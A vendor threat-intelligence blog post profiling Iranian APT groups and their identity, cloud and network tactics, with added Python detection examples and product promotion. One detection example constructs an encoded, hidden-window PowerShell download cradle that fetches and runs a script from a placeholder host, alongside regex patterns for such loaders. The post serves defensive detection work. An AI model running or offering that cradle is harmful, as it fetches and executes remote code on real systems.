Are Iranian APTs Already inside Your Hybrid Network?

July 10, 2025
Lucie Cardiet
Cyberthreat Research Manager

The recent Iran–Israel escalation has sparked a spike in cyber operations from state-linked actors zeroing in on identity, cloud, and enterprise networks. These well-resourced groups combine deep network intrusions with identity abuse to slip past traditional defenses.

They exploit public-facing apps for initial access, harvest credentials via phishing or password spraying, then move laterally with RDP, PsExec, or remote-access services. Persistence comes through scheduled tasks, DLL sideloading, hidden windows, and protocol tunneling. Data is quietly staged, archived, and exfiltrated over obscure channels, often without triggering legacy alerts.

Simultaneously, they launch identity-focused campaigns inside Microsoft 365, Azure, and Google Workspace: abusing OAuth, bypassing MFA, and weaponizing Outlook, OneDrive, and Teams to maintain access and siphon data. These tactics target critical infrastructure, government, commercial enterprises, and NGOs across the Middle East and the West—blending espionage and destructive attacks (wipers, forced encryption).

Relying only on endpoints or perimeter controls leaves you blind to the full attack chain. If you use cloud collaboration, hybrid infrastructure, or remote access, you’re already in their sights.

Recent Activity from Iranian Threat Actors

Iranian threat groups continue to run sustained cyber operations against organizations across government, telecommunications, energy, and technology sectors. Recent campaigns show actors like MuddyWater expanding their use of identity abuse and cloud-native tooling while maintaining traditional PowerShell-based intrusion techniques. Rather than deploying obvious malware, these operators increasingly rely on scripts, legitimate administration tools, and compromised infrastructure to maintain stealth across hybrid environments.

Who’s Behind the Attacks: Iran-Linked APT Profiles

Despite varying goals (ranging from long-term espionage to outright sabotage) each group leverages both network and identity channels to breach, persist, and extract. Below is a high-level view of their initial access, network TTPs, and identity/cloud TTPs.

Iranian threat groups frequently reuse tooling across campaigns, particularly PowerShell frameworks, script loaders, and open-source remote access tools. This reuse makes behavioral detection across identity and network telemetry especially effective.

For each group: aliases, typical initial access, network tactics, and identity/cloud tactics.

APT33 (aliases Peach Sandstorm, HOLMIUM, COBALT TRINITY, Elfin, Refined Kitten)
Initial access: spear-phishing emails built around job postings, social engineering campaigns, and exploitation of known vulnerabilities.
Network tactics:
  • Executing malicious code via PowerShell and scheduled tasks.
  • Moving laterally using RDP, WMI, and stolen credentials.
  • Dumping credentials for escalation and persistence.
  • Archiving and exfiltrating sensitive data over encrypted or obscure channels.
  • Maintaining stealth using obfuscation, registry keys, and encoded traffic.
Identity/cloud tactics:
  • Spear-phishing using job postings and social engineering to obtain credentials.
  • Password-spraying Office 365 and Azure accounts.
  • Once credentials are obtained, signing in to the accounts through commercial VPNs.
  • Using Azure-specific tools to enumerate Entra ID (Azure AD) and harvest user and group data.
  • Delivering malicious ZIPs via Microsoft Teams messages to extract Active Directory information.

APT34 (aliases Helix Kitten, OilRig, CHRYSENE, COBALT GYPSY)
Initial access: spear-phishing emails and fake job postings targeting individuals in specific roles.
Network tactics:
  • Using remote desktop protocols and VPN tunneling for movement.
  • Dumping credentials and escalating privileges via known exploits.
  • Exfiltrating data through DNS tunneling, FTP, and compromised email.
  • Evading detection with masquerading, signed binaries, and firewall manipulation.
Identity/cloud tactics:
  • Spear-phishing emails and fake job postings to gain access to Exchange and other cloud accounts.
  • Leveraging cloud email features such as Exchange rules and forwarding to exfiltrate data stealthily.
  • Keeping individual transfers below size thresholds so that bulk-transfer alerting never fires.
  • Harvesting credentials and reusing them for lateral movement across SaaS environments.

APT35 (aliases Charming Kitten, Magic Hound, Mint Sandstorm, COBALT ILLUSION, TA453, PHOSPHORUS)
Initial access: spear-phishing emails, fake login portals mimicking cloud services, and compromised accounts.
Network tactics:
  • Performing lateral movement via RDP and scheduled tasks.
  • Dumping credentials from browsers and memory for deeper access.
  • Transferring data using encrypted channels and cloud sharing platforms.
  • Evading security by disabling logging and blending C2 traffic with web activity.
Identity/cloud tactics:
  • Targeting credentials through fake login portals mimicking cloud/SaaS services.
  • Bypassing MFA protections using social engineering and convincing fake sign-in pages.
  • Taking advantage of vulnerabilities in cloud-hosted Exchange or other SaaS apps for privileged access.
  • Using cloud accounts to harvest files and emails of interest silently.

APT42 (alias Crooked Charms)
Initial access: prolonged social engineering and impersonation of trusted contacts to gain credentials.
Network tactics:
  • Using encrypted HTTPS channels for stealthy data transfer.
  • Tunneling access through spoofed VPN and masqueraded remote sessions.
  • Executing scripts for discovery, keylogging, and data collection.
  • Blending in with legitimate traffic to avoid raising alerts.
Identity/cloud tactics:
  • Extensive social engineering to gain persistent access to Microsoft 365 and similar platforms.
  • Exploiting legitimate client apps to appear as normal user activity.
  • Downloading OneDrive files and Outlook emails using the compromised account without raising suspicion.
  • Deploying simple scripts to extract sensitive data.

MuddyWater (aliases STATIC KITTEN, Earth Vetala, MERCURY, Seedworm, Mango Sandstorm, TEMP.Zagros)
Initial access: spear-phishing and vulnerability exploitation.
Network tactics:
  • Executing PowerShell-based loaders and scripting frameworks that deploy additional payloads from memory.
  • Using compromised web servers and legitimate hosting infrastructure for command-and-control traffic.
  • Moving laterally using remote administration tools, PowerShell remoting, and WMI.
  • Staging data for exfiltration through HTTP-based C2 channels while blending into normal network activity.
Identity/cloud tactics:
  • Targeting Microsoft 365 credentials through phishing and social engineering campaigns.
  • Abusing legitimate cloud services such as Outlook, OneDrive, and SharePoint to collect and move sensitive data.
  • Using compromised accounts to send internal phishing messages and expand access within the tenant.
  • Leveraging legitimate authentication sessions to maintain persistence without deploying obvious malware.

Rampant Kitten
Initial access: malicious Android apps and phishing to steal credentials and gain device control.
Network tactics:
  • Delivering payloads through remote-template Word documents hosted on spoofed SharePoint domains.
  • Maintaining C2 via SOAP over HTTPS with fallback OneDrive-style endpoints.
  • Exfiltrating Telegram tokens, KeePass vaults, and sensitive files using base64-encoded uploads.
  • Persisting by replacing Telegram's updater and injecting payloads into explorer.exe.
  • Expanding collection through Android backdoors and Telegram-phishing sites.
Identity/cloud tactics:
  • Phishing for Google credentials by mimicking legitimate login pages on Android devices.
  • Using captured credentials to log into Gmail and other Google cloud services.
  • Extracting data via browser sessions and built-in cloud app features while avoiding obvious malware indicators.

Agrius (aliases DarkRypt, Pink Sandstorm, AMERICIUM, Black Shadow, Spectral Kitten)
Initial access: deployment of webshells after phishing or exploiting vulnerable servers.
Network tactics:
  • Gaining access by exploiting public-facing apps and misconfigurations.
  • Performing internal recon and lateral movement via remote desktop tunneling.
  • Dumping credentials for privilege escalation and persistence.
  • Staging and exfiltrating data using common transfer methods.
  • Impairing security tools and disguising activity to evade detection.
Identity/cloud tactics:
  • Deploying scripts to extract credentials from internal accounts after phishing or social engineering access.
  • Pivoting laterally using valid credentials and authorized sessions in cloud apps.

Five Identity and Cloud Techniques SOC Teams Must Monitor

Iran-affiliated threat actors are moving beyond traditional malware and exploits. Their campaigns now hinge on abusing identity systems and living within the trusted tools your organization already uses. These five techniques are central to how they evade detection and maintain persistence in cloud environments. Each represents a critical visibility gap if your team is relying on traditional EDR or SIEM tools alone.

  1. Credential Theft via Spear Phishing
    Fake login portals mimicking Office 365 or Gmail, password spraying, and MFA-bypass techniques.
  2. Cloud Account Hijacks
    Using stolen credentials to access email, OneDrive, SharePoint, or Azure apps.
  3. Recon and Lateral Movement
    Enumerating Entra ID (Azure AD), creating rogue OAuth apps or subscriptions for persistence.
  4. Data Exfiltration via Legitimate Tools
    Moving data through OneDrive, Outlook, or web-based APIs to hide within normal traffic.
  5. Living-Off-the-Land Scripts and Cloud Tools
    Iranian threat actors increasingly rely on PowerShell loaders, administrative scripts, and legitimate cloud APIs instead of custom malware.
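
Techniques 1 and 2 leave a trace in the sign-in log long before any malware runs. The Python below, added here as an illustration and not code from the article or from the Vectra platform, runs three checks over a handful of constructed Entra ID sign-in records: a password spray (one source, one guess per account, many accounts within minutes), a successful sign-in from the spraying source, and a success from a country the account has never signed in from. Field names loosely follow Microsoft Graph's signIn resource; every user, IP address and timestamp is constructed.

```python
"""Identity-log detection over constructed Entra ID sign-in records.

Added example, not part of the article or of any vendor product. Field
names loosely follow Microsoft Graph's signIn resource; every record,
user, IP and timestamp below is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

INVALID_CREDS = 50126  # Entra ID sign-in error code: invalid username or password
SUCCESS = 0

# Constructed sample log (not real telemetry).
SIGNIN_LOG = [
    # A spray: one source, one guess per account, five failures then a hit.
    {"time": "2025-07-01T09:00:00Z", "user": "alice@example.com", "ip": "198.51.100.7", "code": INVALID_CREDS, "country": "NL"},
    {"time": "2025-07-01T09:00:20Z", "user": "bob@example.com",   "ip": "198.51.100.7", "code": INVALID_CREDS, "country": "NL"},
    {"time": "2025-07-01T09:00:40Z", "user": "carol@example.com", "ip": "198.51.100.7", "code": INVALID_CREDS, "country": "NL"},
    {"time": "2025-07-01T09:01:00Z", "user": "dave@example.com",  "ip": "198.51.100.7", "code": INVALID_CREDS, "country": "NL"},
    {"time": "2025-07-01T09:01:20Z", "user": "erin@example.com",  "ip": "198.51.100.7", "code": INVALID_CREDS, "country": "NL"},
    {"time": "2025-07-01T09:01:40Z", "user": "frank@example.com", "ip": "198.51.100.7", "code": SUCCESS,       "country": "NL"},
    # Normal activity: alice at the office, including one mistyped password.
    {"time": "2025-07-01T08:00:00Z", "user": "alice@example.com", "ip": "203.0.113.10", "code": SUCCESS,       "country": "DE"},
    {"time": "2025-07-01T08:30:00Z", "user": "alice@example.com", "ip": "203.0.113.10", "code": INVALID_CREDS, "country": "DE"},
    {"time": "2025-07-01T08:30:15Z", "user": "alice@example.com", "ip": "203.0.113.10", "code": SUCCESS,       "country": "DE"},
    # frank's baseline, then his account used from a country he never signed in from.
    {"time": "2025-06-20T10:00:00Z", "user": "frank@example.com", "ip": "203.0.113.10", "code": SUCCESS,       "country": "DE"},
    {"time": "2025-07-02T03:10:00Z", "user": "frank@example.com", "ip": "192.0.2.44",   "code": SUCCESS,       "country": "TR"},
]


def _ts(rec):
    return datetime.strptime(rec["time"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_spray(log, window=timedelta(minutes=10), min_users=5):
    """Return {ip: users} for sources that failed against >= min_users distinct
    accounts inside `window`. Many accounts, few guesses each, one source is the
    spray signature; one user mistyping a password several times is not."""
    failures = defaultdict(list)
    for rec in log:
        if rec["code"] == INVALID_CREDS:
            failures[rec["ip"]].append((_ts(rec), rec["user"]))
    hits = {}
    for ip, events in failures.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - t0 <= window}
            if len(users) >= min_users:
                hits[ip] = users
                break
    return hits


def spray_followon(log, spray_ips):
    """Successful sign-ins from a spraying source: one of the guesses worked."""
    return sorted((rec["user"], rec["ip"], rec["time"]) for rec in log
                  if rec["code"] == SUCCESS and rec["ip"] in spray_ips)


def new_country_logins(log):
    """Successes from a country the user has never succeeded from before.
    The baseline is built chronologically; a user's first-ever success seeds it."""
    seen = defaultdict(set)
    flagged = []
    for rec in sorted((r for r in log if r["code"] == SUCCESS), key=_ts):
        baseline = seen[rec["user"]]
        if baseline and rec["country"] not in baseline:
            flagged.append((rec["user"], rec["country"], rec["ip"], rec["time"]))
        baseline.add(rec["country"])
    return flagged


def run(log=SIGNIN_LOG):
    spray = detect_spray(log)
    return {
        "spray_sources": {ip: sorted(users) for ip, users in spray.items()},
        "spray_followon": spray_followon(log, set(spray)),
        "new_country": new_country_logins(log),
    }


if __name__ == "__main__":
    for name, value in run().items():
        print(name, value)
```

In a real tenant the same three functions run over the SigninLogs export (or the Graph signIn feed) with the window and user threshold tuned to the tenant's size; the follow-on check is the one that turns a noisy spray alert into a confirmed compromise, because it ties the eventual success back to the spraying source.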

MITRE ATT&CK techniques used by Iranian APTs, by tactic:

  • TA0001 Initial Access: T1566.001 Spearphishing Attachment; T1566.002 Spearphishing Link; T1133 External Remote Services; T1190 Exploit Public-Facing Application
  • TA0002 Execution: T1047 Windows Management Instrumentation; T1053.005 Scheduled Task; T1059.001 PowerShell
  • TA0003 Persistence: T1098.005 Device Registration; T1547 Boot or Logon Autostart Execution
  • TA0004 Privilege Escalation: T1068 Exploitation for Privilege Escalation; T1055 Process Injection
  • TA0005 Defense Evasion: T1564.003 Hidden Window; T1036.005 Match Legitimate Name or Location (Masquerading); T1562.001 Disable or Modify Tools
  • TA0006 Credential Access: T1110.003 Password Spraying; T1555 Credentials from Password Stores; T1555.003 Credentials from Web Browsers; T1003 OS Credential Dumping; T1621 Multi-Factor Authentication Request Generation; T1558.003 Kerberoasting
  • TA0007 Discovery: T1012 Query Registry; T1082 System Information Discovery; T1069.002 Domain Groups; T1069.003 Cloud Groups; T1482 Domain Trust Discovery
  • TA0008 Lateral Movement: T1021.001 Remote Desktop Protocol; T1021.002 SMB/Windows Admin Shares
  • TA0009 Collection: T1560 Archive Collected Data
  • TA0011 Command and Control: T1071.001 Web Protocols; T1102.001 Dead Drop Resolver; T1572 Protocol Tunneling
  • TA0010 Exfiltration: T1048 Exfiltration Over Alternative Protocol
  • TA0040 Impact: T1485 Data Destruction; T1486 Data Encrypted for Impact

Why Iranian APTs Are Targeting Cloud and Identity

For Iranian threat groups, cloud platforms and identity systems offer scale, stealth, and strategic access. These attackers are adapting their operations to match how organizations actually work today. Remote access, federated identity, and cloud-first infrastructure have created a wide attack surface where traditional controls often lack visibility.

Key reasons these environments are attractive targets include:

  • Identity is the new perimeter. Once attackers obtain valid credentials tied to SaaS platforms or cloud admin roles, they often bypass traditional defenses entirely. Security tools focused on endpoints or firewalls rarely flag authenticated API calls or abnormal login behavior when the session appears legitimate.
  • Cloud environments provide operational cover. Iranian APT groups frequently operate within sanctioned applications such as Microsoft 365, Azure, and Google Workspace. They exploit weak OAuth policies, misconfigured conditional access rules, and excessive privileges to maintain persistence while blending into normal user activity.
  • Hybrid networks create pivot opportunities. Many organizations maintain links between on-prem systems and cloud environments. Iranian actors have abused identity synchronization services and hybrid management tools to pivot from compromised internal systems into cloud tenants, allowing them to expand access across environments.
  • Living-off-the-land scripting reduces malware visibility. Recent campaigns from groups such as MuddyWater show heavy reliance on PowerShell loaders and script-based frameworks that execute payloads directly in memory. Instead of deploying obvious malware, attackers retrieve tools dynamically and operate using native system capabilities.
  • Cloud-native tooling is dual-use. Tools like the Microsoft Graph API, PowerShell, Outlook, Teams messaging, and remote administration software are designed to enable productivity. Iranian actors routinely use these same capabilities to enumerate environments, move laterally, and exfiltrate data while remaining difficult to distinguish from legitimate activity.

In short, cloud and identity attacks allow Iranian APT groups to operate quietly across hybrid environments. They blend into legitimate user behavior, avoid traditional defenses, and exploit visibility gaps that many organizations still struggle to monitor effectively.
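
The PowerShell-loader pattern in the fourth bullet is detectable from script block or process command-line logging without any malware signature, because the loaders combine the same few switches and cradles. The Python below, an added example not drawn from the article or from any vendor product, scans constructed command lines for that combination: a hidden window, an execution-policy bypass, an encoded command, and, after decoding it, a download cradle fed to Invoke-Expression or an in-memory assembly load. The command lines and the 203.0.113.5 host are constructed.

```python
"""Living-off-the-land PowerShell triage over constructed command lines.

Added example, not from the article or any product. Patterns cover the
switches and cradles script-based loaders rely on; the sample command
lines and the 203.0.113.5 host below are constructed.
"""
import base64
import re

PATTERNS = {
    # Remote payload retrieval (DownloadString/-File, iwr/irm and their long names).
    "download_cradle": re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b)", re.I),
    # Executing retrieved text as code.
    "invoke_expression": re.compile(r"\b(Invoke-Expression|IEX)\b", re.I),
    # Loading a .NET assembly straight from bytes, never touching disk.
    "in_memory_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I),
    # -w hidden / -WindowStyle Hidden (ATT&CK T1564.003).
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    # -ep bypass / -ExecutionPolicy Bypass.
    "policy_bypass": re.compile(r"-e(p|x\w*)\s+bypass", re.I),
    # -e / -ec / -enc / -EncodedCommand followed by base64 (UTF-16LE script).
    "encoded_command": re.compile(r"-e(c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}

# Constructed samples: a loader one-liner, a benign scheduled backup, an in-memory load.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/loader.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()
SAMPLES = [
    f"powershell.exe -NoP -W Hidden -Ep Bypass -Enc {ENCODED}",
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
    'powershell -c "$a=[System.Reflection.Assembly]::Load((iwr http://203.0.113.5/x).Content); '
    '$a.EntryPoint.Invoke($null,$null)"',
]


def decode_encoded_command(b64):
    """PowerShell -EncodedCommand is base64 over UTF-16LE; return None if malformed."""
    try:
        return base64.b64decode(b64).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(text):
    """Match every pattern against the command line, then against the decoded
    payload if one is present, so a cradle hidden behind -Enc is still seen."""
    indicators = set()
    decoded = None
    for name, rx in PATTERNS.items():
        m = rx.search(text)
        if not m:
            continue
        indicators.add(name)
        if name == "encoded_command":
            decoded = decode_encoded_command(m.group(2))
    if decoded:
        for name, rx in PATTERNS.items():
            if name != "encoded_command" and rx.search(decoded):
                indicators.add(name)
    return {"indicators": sorted(indicators), "decoded": decoded, "score": len(indicators)}


def triage(samples=SAMPLES, min_score=2):
    """Return (index, score, indicators) for command lines worth an analyst's time.
    A single indicator (one -ep bypass in a build script) is noise; two or more together is not."""
    out = []
    for i, line in enumerate(samples):
        r = analyze(line)
        if r["score"] >= min_score:
            out.append((i, r["score"], r["indicators"]))
    return out


if __name__ == "__main__":
    for i, score, ind in triage():
        print(f"sample {i}: score {score}: {', '.join(ind)}")
        print("  decoded:", analyze(SAMPLES[i])["decoded"])
```

The scoring deliberately requires two indicators before a line is surfaced: `-ExecutionPolicy Bypass` on its own is common in legitimate automation, but paired with a hidden window and an encoded command it is the loader signature, and decoding the payload is what exposes the cradle the first-pass regexes would otherwise miss.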

Security Controls to Disrupt Iranian APT Tradecraft

To reduce your exposure to the techniques detailed above and make your environment a harder target, we recommend the following immediate actions:

  1. Enforce multi-factor authentication on every account, including service and admin accounts, so a sprayed or phished password alone is not enough.
  2. Enable Conditional Access and device policies on cloud/SaaS accounts.
  3. Monitor login activity for suspicious IPs, unusual geographies, and VPN-originated logins.
  4. Lock down OAuth apps and permissions: review all app consents and service accounts in Microsoft 365/Azure.
  5. Audit privileged accounts regularly, especially those with admin roles within Exchange/Azure.
  6. Implement user training: recognizing fake login portals and social engineering tactics.
  7. Monitor for data exfiltration: set up DLP rules and Cloud Access Security Broker (CASB) policies.
  8. Check MFA push behavior: restrict notifications after repeated failed attempts, or move to phishing-resistant MFA such as FIDO2, which also defeats the fake sign-in pages described above.
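
Control 4 is the one most teams still do by eye in the portal. The Python below, added here as an example and not code from the article or from Vectra, scores a constructed set of OAuth2 permission grants the way a reviewer would: third-party apps with no verified publisher, mail, file or directory scopes, offline_access paired with data scopes (a long-lived refresh token, the persistence technique described in the APT42 and MuddyWater rows), and tenant-wide consent. Record shapes mirror Microsoft Graph's oauth2PermissionGrant and servicePrincipal objects; all IDs, app names, tenant IDs and grants are constructed placeholders.

```python
"""OAuth consent audit over constructed Microsoft 365 grant data.

Added example, not Vectra code. Shapes mirror Microsoft Graph's
oauth2PermissionGrant (clientId, consentType, principalId, scope) and
servicePrincipal (displayName, appOwnerOrganizationId, verifiedPublisher)
objects; every ID, name, tenant and grant below is a constructed placeholder.
"""

OUR_TENANT = "tenant-contoso"          # placeholder for the customer's tenant ID
MICROSOFT_TENANT = "tenant-microsoft"  # placeholder for the first-party app owner tenant

# Delegated scopes that hand an attacker mailboxes, files or the directory.
HIGH_IMPACT = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite.All",
    "Sites.Read.All", "Sites.ReadWrite.All",
    "Directory.Read.All", "Directory.ReadWrite.All",
    "User.Read.All", "Group.Read.All",
}
PERSISTENCE = {"offline_access"}  # refresh token: access outlives the user's session

SERVICE_PRINCIPALS = {  # keyed by service principal object id (constructed)
    "sp-teams": {"displayName": "Microsoft Teams", "appOwnerOrganizationId": MICROSOFT_TENANT, "verifiedPublisher": "Microsoft"},
    "sp-sync":  {"displayName": "Mail Sync Helper", "appOwnerOrganizationId": "tenant-unknown", "verifiedPublisher": None},
    "sp-hr":    {"displayName": "Contoso HR Portal", "appOwnerOrganizationId": OUR_TENANT, "verifiedPublisher": None},
    "sp-pdf":   {"displayName": "PDF Tools", "appOwnerOrganizationId": "tenant-vendor", "verifiedPublisher": "Some Vendor Ltd"},
}

GRANTS = [  # constructed oauth2PermissionGrant records
    {"id": "g1", "clientId": "sp-teams", "consentType": "AllPrincipals", "principalId": None, "scope": "User.Read Chat.Read"},
    {"id": "g2", "clientId": "sp-sync", "consentType": "Principal", "principalId": "frank", "scope": "Mail.Read Files.Read.All offline_access"},
    {"id": "g3", "clientId": "sp-hr", "consentType": "AllPrincipals", "principalId": None, "scope": "User.Read Directory.Read.All"},
    {"id": "g4", "clientId": "sp-pdf", "consentType": "Principal", "principalId": "alice", "scope": "User.Read openid"},
]


def risk_score(grant, sp, tenant_id=OUR_TENANT):
    """Additive score with a reason per point source, so the finding explains itself."""
    scopes = set(grant["scope"].split())
    score, reasons = 0, []
    if sp["appOwnerOrganizationId"] != tenant_id and not sp.get("verifiedPublisher"):
        score += 2
        reasons.append("third-party app with no verified publisher")
    hi = scopes & HIGH_IMPACT
    if hi:
        score += len(hi)
        reasons.append("high-impact scopes: " + ", ".join(sorted(hi)))
    if hi and scopes & PERSISTENCE:
        score += 2
        reasons.append("offline_access with data scopes (long-lived refresh token)")
    if grant["consentType"] == "AllPrincipals":
        score += 1
        reasons.append("tenant-wide consent (every user in scope)")
    return score, reasons


def audit(grants=GRANTS, sps=SERVICE_PRINCIPALS, tenant_id=OUR_TENANT, threshold=3):
    """Return findings at or above `threshold`, highest score first."""
    findings = []
    for g in grants:
        sp = sps[g["clientId"]]
        score, reasons = risk_score(g, sp, tenant_id)
        if score >= threshold:
            findings.append({"grant": g["id"], "app": sp["displayName"],
                             "principal": g["principalId"] or "ALL", "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in audit():
        print(f"{f['score']:>2} {f['app']} ({f['grant']}, principal={f['principal']})")
        for r in f["reasons"]:
            print("    -", r)
```

Live data for the same audit comes from Microsoft Graph (`GET /oauth2PermissionGrants` and `GET /servicePrincipals`); the point of the scoring is that a first-party app with broad scopes and a tenant-owned app with directory read are expected, while an unverified third-party app holding mail and file scopes plus offline_access for a single user is exactly the consent footprint a compromised account leaves behind.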

These controls harden your environment, but detecting credential misuse and network stealth once a control has been bypassed requires active, behavior-driven visibility.

Turn Iranian APT Intelligence Into Immediate Threat Hunting

Understanding how Iranian threat groups operate is only the first step. The next challenge is determining whether those same techniques are already happening inside your environment.

SOC teams don’t need another report explaining attacker tradecraft. What they need are concrete ways to test their environment for those behaviors.

To help security teams move from intelligence to investigation, we created a set of threat hunts tied directly to Iranian APT tradecraft observed in recent campaigns. These hunts surface early indicators across identity and network activity, including:

  • Suspicious Microsoft 365 device registrations linked to credential compromise
  • OilRig command-and-control infrastructure communication
  • SpyNote and QuasarRAT DNS activity tied to attacker infrastructure
  • Failed device registrations that may indicate APT35 reconnaissance
  • Network sessions associated with Pupy malware infrastructure

Each hunt includes a ready-to-run query you can execute inside the Vectra AI Platform to quickly identify potential attacker activity.

Hunting for Iranian APT-related activity in the Vectra AI Platform

Running targeted hunts like these helps analysts move from passive monitoring to proactive detection. Instead of waiting for alerts, your team can directly search for the behaviors Iranian operators rely on once they gain access.

Because these actors blend identity abuse, SaaS activity, and network infrastructure, effective detection requires visibility across all three.

That’s exactly where the Vectra AI Platform provides an advantage.

How the Vectra AI Platform Exposes Iranian APT Activity

Traditional security tools tend to focus on isolated signals: endpoint alerts, firewall logs, or authentication events. Iranian threat actors operate across identity systems, SaaS platforms, and network infrastructure simultaneously, which makes those siloed approaches easy to evade.

The Vectra AI Platform continuously analyzes behavior across:

  • Network traffic
  • Active Directory and Entra ID
  • Microsoft 365 identity activity
  • Cloud platforms including AWS and Azure

Instead of relying on static indicators, the platform identifies abnormal behavior that signals compromise even when attackers use legitimate credentials or sanctioned cloud tools.

This gives SOC teams the visibility needed to detect the exact techniques used by Iranian APT groups: credential abuse, identity manipulation, stealthy lateral movement, and covert command-and-control activity.

According to IDC, organizations using Vectra AI identify 52% more threats in at least 50% less time.

Here’s how Vectra AI detects each of the five core techniques used by Iranian APTs:

  • Credential theft: detects password spraying and suspicious sign-in behaviors, including anomalous geography, user agents, and VPN-originated logins.
  • Cloud account hijack: flags unauthorized access to mailboxes, OneDrive, and other services, especially when behavior deviates from the user's normal baseline.
  • Recon and lateral movement: identifies enumeration of Entra ID objects, rogue OAuth consent flows, and suspicious Azure subscription activity.
  • Data exfiltration via legitimate tools: detects abnormal data movement through sanctioned SaaS apps, such as large downloads or bulk file transfers over API.
  • Living off the land: surfaces abuse of native tools like Outlook, PowerShell, and remote access software that blend into routine workflows.

The Vectra AI Platform does not require agents. It integrates natively with Microsoft and applies real-time detection logic tailored to identity-driven attacks. This approach delivers precise, high-fidelity alerts and automated response capabilities that empower SOC teams to act decisively without drowning in false positives.

Already a Vectra AI NDR customer?

To defend against this new wave of identity and cloud-centric attacks, we strongly recommend expanding your existing deployment with Identity and Cloud coverage. This ensures unified visibility and protection across hybrid environments where these threat actors thrive.

FAQs